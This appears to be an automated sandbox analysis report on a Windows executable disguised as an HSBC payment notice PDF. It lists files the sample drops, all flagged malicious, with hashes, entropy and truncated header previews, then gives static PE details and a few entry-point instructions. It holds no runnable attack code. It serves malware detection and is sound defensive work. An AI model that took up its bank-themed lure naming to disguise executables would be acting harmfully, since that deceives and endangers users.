                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@............................. ........... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1513984
                                                                                                                                                                              Entropy (8bit):7.094171742001237
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:k3frCoQ9tLsiLPLe24CxruW4bIhllP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:k3fIsIPLkCNuVbIhDPLNiXicJFFRGNzb
                                                                                                                                                                              MD5:72A7E20B40A8835CB1F0E27727892C04
                                                                                                                                                                              SHA1:BD84408C913AF9F25445ED22B4F3447E273B1597
                                                                                                                                                                              SHA-256:51AF564A3CA7607A1F99E643557A81B76FF5A20284B899535C5C6C037D79FC63
                                                                                                                                                                              SHA-512:48AFAE0DC64FF056D0B07FC9347EF275CACA744233E734EF6573CAEE38835E2C59692167D2D73A2C63BC1FF78CA95E01F1A840C8C83AEFD5222092873B2B9992
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@....................................~..... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1846784
                                                                                                                                                                              Entropy (8bit):6.9327025005797225
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:TF2YuHNETovAvNYf8kmbLNiXicJFFRGNzj3:C6BCf8kw7wRGpj3
                                                                                                                                                                              MD5:B5B69EF9D3C1E73A01C81AE80208DDC4
                                                                                                                                                                              SHA1:9F0642707F10F1FF3504F3DFB8D8B5C9918C79D5
                                                                                                                                                                              SHA-256:967C792DD0ECB2D3765C349B751562B00DCB9BF21FA7FCE6E5199727D3F7DFE5
                                                                                                                                                                              SHA-512:C5EC8025E4A0F7523B4E391115F10C6A3664F34AAD29D6DD76C5D90CC4B9CDA9E7D35B4393E9E2F0BE3105ADD1ABF44D62F8CEE3EC0A8FE6130AE5CB4387A0F8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p........... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1455616
                                                                                                                                                                              Entropy (8bit):7.230975190409546
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:UiW6ZvAKF5i/dN9Bde9j9Trk+Fz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UYxF50b9Bdu9Tx9LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:72181D2F9FF55560F9C4B3AB19C98A62
                                                                                                                                                                              SHA1:37FE863594185CAE54494D71717736C7ABD88EDF
                                                                                                                                                                              SHA-256:CA06623D2F3D1241CC585CBF17216C95DDC2F6279821A43E485029AAD8584D3F
                                                                                                                                                                              SHA-512:CE2EC21D19773A996756AE6940ABF1F356AC2BD9FDD9B4B0C0BE1360B8B707521583E9E99E041BA4A69C98216ABA7BA8CA0FB3F85D85BE9BF7447CC2E5E6BC17
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.....................................M.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1611264
                                                                                                                                                                              Entropy (8bit):5.048875121989025
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:3JnJ5D3WXS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3JnJ5DGXSLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5E4593411714FE016FDCC665AFE5D552
                                                                                                                                                                              SHA1:1D48797B33B47AF80B23BB46E9C5D771944BCAF2
                                                                                                                                                                              SHA-256:D1C0AC067719FF2EAF09E13CAAB14F208553408C7E855F56C79982E21E568A6D
                                                                                                                                                                              SHA-512:76E60D4E1DF80A11E6CFA67EC5580622898DB334B18E442035B154C13B44B3D748DDDD25963AA30CC4035A78FE28686570651051F5FBA728BB107F3F833BD48F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@..............................#......=.... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...`...0......................@...................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2075136
                                                                                                                                                                              Entropy (8bit):6.729881524298672
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:fPK8mJYTerDjfJ2313e1mP1MdnURLNiXicJFFRGNzj3:Z7wRGpj3
                                                                                                                                                                              MD5:90420B1BFAA6B7760AA760FB6F16CA8E
                                                                                                                                                                              SHA1:04E83807F1439C81D20DCF638186D6C907F1CF8F
                                                                                                                                                                              SHA-256:B7D4834859C4D6313F99D31474D2A9913740100805179B29E4DEE1A6374F545F
                                                                                                                                                                              SHA-512:3CCB4B127ACDFD21054FF652F7196CDE8EF768CB5479D95079D596293CA1C7B82C4E1F8AF2E9C69A6F4B612FAC69E16760D134B4C4EDCAE699C10D51AE19D38D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ......: ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1381376
                                                                                                                                                                              Entropy (8bit):4.682132078917755
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:onN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:onNLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2AF371D31DE2620D08F24582BCC94F36
                                                                                                                                                                              SHA1:954B8925FB5E7BEED04C9F387CD5ADE6DE7988C0
                                                                                                                                                                              SHA-256:3672775ED17AB98A2833CB588020B43645A6CBACC55E5B2567756434DDBA014F
                                                                                                                                                                              SHA-512:8B40A0AE51EA61CDE604BF9DBAF83E73BB65E2F2509742C5253C83EECE77BF68C20AC6854EFE560C09372DA94BF2531AEF32B7C664780EB70BB06F0418F88020
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. ........... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1434112
Entropy (8bit):4.680774906200706
Encrypted:false
SSDEEP:24576:aIy2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:aIBLNiXicJFFRGNzj3
MD5:AAA284FF086F56BEC322CDE13CE5989C
SHA1:7764C89A9603F5EE9A920307DD215188F0ACB899
SHA-256:44A55C3BC5C40FCB3D0819BF81DA43166A7C4C086000C3F66E782C99463F14F5
SHA-512:55959E1C09F95103C8125D2E70EDBA58415FD5A50D782AFA25DED247D1A2AB2EEEA28C2729D4189DE7306BBACF8DC9265C41BBAB954919A0E1E55E2204D1E3DC
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@..............................!......&.... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...`...........B..............@...................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1355264
Entropy (8bit):4.598859870053783
Encrypted:false
SSDEEP:12288:04KCiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:SE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:C7CAA8E47900764B066134787F8A8BC7
SHA1:76C98FDBC352019B9D61FC81CDA693BE0E5690F1
SHA-256:050F1A2985EE832A293FBEBB75A98735DE866660A2D7A4589C4A689D365A4DC8
SHA-512:040509033554913B0E70A5FECBD20F5AC44B3433B74E9EF57BF901FFCBA96F538FC36C5A8B92BDFE80320EAC8F212046B49FC6F00C28191600095411596B73A2
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@....................................zG.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...`...`......................@...........................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1302528
Entropy (8bit):4.527059693137494
Encrypted:false
SSDEEP:12288:CyXiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z7:Lj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:C3DD833FAFF8B6217772A5E66FF25F25
SHA1:8EA2B0D9311079763A9D7DEF4D4C04B8BD086332
SHA-256:1C416E9BE5B07C9E146546343A8A8C31AB4B4BB4F167D11CBA3692019E4A8346
SHA-512:50F0C3F9D47573D971FC74DE263F356E68DD2F7160872726DEA127AE88829A3916760220B33AB332EE1F458FBFD6EB22CAB26BCF31E28FF0758522F9F68FFE39
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.......................................... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1303552
Entropy (8bit):7.1607520397020705
Encrypted:false
SSDEEP:24576:kZ0FxT1UoYr99GdcJKm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4wWsmLNiXicJFFRGNzj3
MD5:D2428B28D20D38757D35F80B6491A864
SHA1:59D3A274666C0A231F932EB704A710CA97416B01
SHA-256:AAA39F1530029D220335FACD4E8480F915CC0EF8C88EE2417CE7D91FF2CF2B41
SHA-512:C76EC5A775A92091D9A6BD989DC0CD4FF88FA948B4C82687DBC85AA0A2105C8E089AD6D2848BE6A8C4340C2CAD83988BBB4ECD0322B9F898189F6CE5B83FCC2B
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@......3Y.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1495040
Entropy (8bit):4.819234563906032
Encrypted:false
SSDEEP:24576:9yocDApl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:AocDAplLNiXicJFFRGNzj3
MD5:B3EFF6E9F06FD02074538D773AF5CAE9
SHA1:03677B8E19E04DD8942E7DF8010BA3873CA764B9
SHA-256:8CAB7B9A29BF4793DCCF10BFB72902D6506CCCADFCEEE2816C5EE5FF4EDF5369
SHA-512:C429B6BE791F3CA1BC0EABE724CD6A80D6471D924C9409DB1D2E5B8E5995C43CB4E5335C45B949CFC3B45F8D612C4D63A99FC54612641F7A1D9E898AF84E8904
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@..............................!........... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...`...p.......0..............@...........................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2164736
Entropy (8bit):7.056787493628267
Encrypted:false
SSDEEP:49152:yWcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKxLNiXicJFFRGNzj3:k0zuNIP7wRGpj3
MD5:7FEABE370E82D30A720E4A9459EFC1EB
SHA1:AE461A8D4DC686A1A2DCB68F284A359803249078
SHA-256:3FA83425634CC23B954FD5A22F5E289C2180CDA3E66E0EADF29B857B28E19943
SHA-512:CD8AD9EF8B037D8E88B76BD961C271A7357B78F9618147260DFC8056C9185F443F141BB33DA773C1CBD9AC6794C2A0A36671BB4638F964B4EDCD4BDFC6A41684
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.......!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.10002116231540173
Encrypted:false
SSDEEP:6:Qcqf1K3l/k/uMclF6vMclFq5zzT1pDNOn+SkUeYDwDzymhf1zj:nqdKV/kqF69Fq5zzRHO+pawHymhdv
MD5:A2208544A597AF26E95A01740F70332F
SHA1:C7BC906E61579A0322258056299946D3A53F8591
SHA-256:3CBB84FC6D5CBD0613F71454B7EC3917D710725F814D8E547C2B5652A2F84510
SHA-512:FA3809EB0569F7E882A41EBEC558254A37636C3249A3C38CF682160B2821702D7B667918C0B072043BB33F848C071E4CC595B2C87A3CAADA3C4B0D0DF1547256
Malicious:false
Preview:....`...`.......................................`...!...........................t...p...Y.P.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W.................V.K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.t...p...Y.P.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.10148832067800173
Encrypted:false
SSDEEP:6:DB/l1K3l/k/uMclF6vMclFq5zzT1pq1NMu3n+SkUeYDwDzyMx/l1zb:DBHKV/kqF69Fq5zzRknX+pawHymHn
MD5:BEC2E9233360D65D16BFEB713E205B61
SHA1:4C8F63538C2F5CFA79224C845628EF2A545A1CE3
SHA-256:245688BBA509069AB4B4D114C57DFD54B0E403C8F7A7A837C30747435B5F6FD0
SHA-512:409E49C1595F55D0C6A162CDA3713C4BD607731CB1CE7721FFEE30CA8ADB6E5BAADE028935755143CEC573AC992683111655D1130CE202995DED64864274D864
Malicious:false
Preview:....h...h.......................................h...!...........................t...p.....Q.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............G..V.K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.t...p.....Q.............................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09885495711347125
Encrypted:false
SSDEEP:6:ugK81K3Nk/uMclF6vMclFq5zzT1p6wNIn+SkUeYDwDzyJ81zr:ud0K9kqF69Fq5zzRVI+pawHyJ03
MD5:31039D81EEE7ABD40E7D0815A1CB8CCF
SHA1:C3C928989DF47C6408B32FF64D774D0855588D98
SHA-256:FA5F9151EA53116C17E908D558E907A41EF4B7A25F6146FB67E36C1F94CA889F
SHA-512:73DA46DB62282C02CA026C56577470801CD7BB83D0CDDB6EEB21E5A9F4B6B6BAA3A3A89D46F28ACD33F96724D78A2D13FF1E75D4A7E3C82F6A16006B0B5342C1
Malicious:false
Preview:....X...X.......................................X...!...........................t...p.....P.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............e*.V.K..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.t...p.....P.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.412345114073512
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File size:1'587'200 bytes
                                                                                                                                                                              MD5:4bd5ab8c1d6eb0d7b601863a74471cf3
                                                                                                                                                                              SHA1:660bd416b9570b16fa77e2e559989f8efb9fd8b4
                                                                                                                                                                              SHA256:0b3ad575168e0457905f19bb5304a8ea8cce461d7b1ebd0964d1171374271e47
                                                                                                                                                                              SHA512:783e5707028cc8acfc022cf4ee50b81689b330faf3cc6312f91d699be4574f389938b60e171849c93e64f86ce7842e13f5665ae9f6f2435e49e8c04a964380bf
                                                                                                                                                                              SSDEEP:49152:IW0c++OCvkGs9FaYwUPYyLNiXicJFFRGNzj3:jB3vkJ9TPj7wRGpj3
                                                                                                                                                                              TLSH:D775D02263DDC360CB769133BF69B7016EBF3C654630B85B2F981D7DA960162162C7A3
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                                                                              Icon Hash:aaf3e3e3938382a0
                                                                                                                                                                              Entrypoint:0x427dcd
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x67593553 [Wed Dec 11 06:46:43 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                              File Version Major:5
                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                                                                              Instruction
                                                                                                                                                                              call 00007F3A50C40B4Ah
                                                                                                                                                                              jmp 00007F3A50C33914h
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              push edi
                                                                                                                                                                              push esi
                                                                                                                                                                              mov esi, dword ptr [esp+10h]
                                                                                                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                              add eax, esi
                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                              jbe 00007F3A50C33A9Ah
                                                                                                                                                                              cmp edi, eax
                                                                                                                                                                              jc 00007F3A50C33DFEh
                                                                                                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                                                                                                              jnc 00007F3A50C33A99h
                                                                                                                                                                              rep movsb
                                                                                                                                                                              jmp 00007F3A50C33DACh
                                                                                                                                                                              cmp ecx, 00000080h
                                                                                                                                                                              jc 00007F3A50C33C64h
                                                                                                                                                                              mov eax, edi
                                                                                                                                                                              xor eax, esi
                                                                                                                                                                              test eax, 0000000Fh
                                                                                                                                                                              jne 00007F3A50C33AA0h
                                                                                                                                                                              bt dword ptr [004BE324h], 01h
                                                                                                                                                                              jc 00007F3A50C33F70h
                                                                                                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                                                                                                              jnc 00007F3A50C33C3Dh
                                                                                                                                                                              test edi, 00000003h
                                                                                                                                                                              jne 00007F3A50C33C4Eh
                                                                                                                                                                              test esi, 00000003h
                                                                                                                                                                              jne 00007F3A50C33C2Dh
                                                                                                                                                                              bt edi, 02h
                                                                                                                                                                              jnc 00007F3A50C33A9Fh
                                                                                                                                                                              mov eax, dword ptr [esi]
                                                                                                                                                                              sub ecx, 04h
                                                                                                                                                                              lea esi, dword ptr [esi+04h]
                                                                                                                                                                              mov dword ptr [edi], eax
                                                                                                                                                                              lea edi, dword ptr [edi+04h]
                                                                                                                                                                              bt edi, 03h
                                                                                                                                                                              jnc 00007F3A50C33AA3h
                                                                                                                                                                              movq xmm1, qword ptr [esi]
                                                                                                                                                                              sub ecx, 08h
                                                                                                                                                                              lea esi, dword ptr [esi+08h]
                                                                                                                                                                              movq qword ptr [edi], xmm1
                                                                                                                                                                              lea edi, dword ptr [edi+08h]
                                                                                                                                                                              test esi, 00000007h
                                                                                                                                                                              je 00007F3A50C33AF5h
                                                                                                                                                                              bt esi, 03h
                                                                                                                                                                              jnc 00007F3A50C33B48h
                                                                                                                                                                              Programming Language:
                                                                                                                                                                              • [ASM] VS2013 build 21005
                                                                                                                                                                              • [ C ] VS2013 build 21005
                                                                                                                                                                              • [C++] VS2013 build 21005
                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                                                                                                              • [RES] VS2013 build 21005
                                                                                                                                                                              • [LNK] VS2013 UPD4 build 31101
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xba44c         | 0x17c        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xc7000         | 0x2d074      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x92bc0         | 0x1c         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xa4870         | 0x40         | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x8f000         | 0x884        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type          | Entropy            | Characteristics
.text  | 0x1000          | 0x8dcc4      | 0x8de00  | 8981ff34fb52b0989d43166b389e1422 | False    | 0.5728679102422908  | data               | 6.676128389733014  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000         | 0x2e10e      | 0x2e200  | 79b14b254506b0dbc8cd0ad67fb70ad9 | False    | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xbe000         | 0x8f74       | 0x5200   | 9f9d6f746f1a415a63de45f8b7983d33 | False    | 0.1017530487804878  | data               | 1.198745897703538  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
